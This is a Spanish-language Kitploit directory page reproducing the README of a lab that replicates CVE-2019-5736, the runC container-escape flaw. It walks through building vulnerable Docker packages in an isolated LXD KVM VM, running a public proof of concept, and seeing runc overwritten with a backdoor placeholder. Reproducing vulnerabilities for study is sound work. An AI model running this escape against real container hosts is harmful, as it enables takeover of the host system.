Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2019-5736-reproducer — Reproductor para CVE-2019-5736, una vulnerabilidad de escape de contenedor RunC. Proporciona scripts de compilación y un laboratorio basado en KVM para confirmar el exploit contra paquetes Docker vulnerables. | Kitploit
Herramientas/GitHubGitHub/takumak/cve-2019-5736-reproducer
Seguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónSeguridad en la NubeAprendizaje y EducaciónEscape de Contenedores
GitHubtakumak/cve-2019-5736-reproducer

cve-2019-5736-reproducer

Reproductor para CVE-2019-5736, una vulnerabilidad de escape de contenedor RunC. Proporciona scripts de compilación y un laboratorio basado en KVM para confirmar el exploit contra paquetes Docker vulnerables.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
7hace 4 añosAún no revisado

CVE-2019-5736 reproductor

Esto te permite confirmar que RunC-CVE-2019-5736 funciona en tu instancia KVM.

Resumen del flujo de trabajo

  • Construye los paquetes relacionados con docker.io vulnerables a CVE-2019-5736 en este repositorio
  • Lanza una instancia KVM de Ubuntu 18.04 en LXD
  • Instala los paquetes *.deb vulnerables en la VM
  • Prueba el procedimiento presentado en RunC-CVE-2019-5736

Construir paquetes *.deb vulnerables

root@kitploit:~
$ docker-compose build --no-cache
$ docker-compose run build

Preparar el tarball fuente de RunC-CVE-2019-5736

root@kitploit:~
$ git clone https://github.com/twistlock/RunC-CVE-2019-5736.git
$ tar cjf RunC-CVE-2019-5736.tar.bz2 RunC-CVE-2019-5736

Lanzar una instancia KVM de Ubuntu 18.04 en LXD

root@kitploit:~
$ lxc launch --vm images:ubuntu/18.04 test-cve-2019-5736 -c limits.cpu=4 -c limits.memory=4GB
$ lxc file push deb/*.deb RunC-CVE-2019-5736.tar.bz2 test-cve-2019-5736/root/
$ lxc exec test-cve-2019-5736 bash
root@test-cve-2019-5736:~# sed -i -e '/bionic-updates/s/^/#/' -e '/bionic-security/s/^/#/' /etc/apt/sources.list
root@test-cve-2019-5736:~# apt update
root@test-cve-2019-5736:~# apt install iptables libltdl7
root@test-cve-2019-5736:~# dpkg -i containerd_0.2.5-0ubuntu2_amd64.deb docker.io_17.12.1-0ubuntu6_amd64.deb runc_1.0.0~rc6+git20181203.96ec2177-0~ubuntu2_amd64.deb

Nota que deberías usar images:ubuntu/18.04 en lugar de ubuntu:18.04 porque el comando lxc exec no funciona correctamente con este último.

Reproducir RunC-CVE-2019-5736

root@kitploit:~
$ lxc exec test-cve-2019-5736 bash
root@test-cve-2019-5736:~# tar xf RunC-CVE-2019-5736.tar.bz2
root@test-cve-2019-5736:~# cd RunC-CVE-2019-5736
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# docker build -t cve-2019-5736:exec_POC ./exec_POC
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
92b965383f377419f3dad7cec45e468a4c4a83e82e11a2f2e0e23803016e2840
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# docker exec poc_ctr bash
No help topic for '/usr/bin/bash'
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# /usr/bin/docker-runc

**THE ALL NEW AND IMPROVED RUNC**

        [+] Your backdoor here ->

root@test-cve-2019-5736:~/RunC-CVE-2019-5736# 

Apéndice

  • Fix commit: https://github.com/opencontainers/runc/commit/0a8e4117e7f715d5fbeef398405813ce8e88558b
Descargar herramienta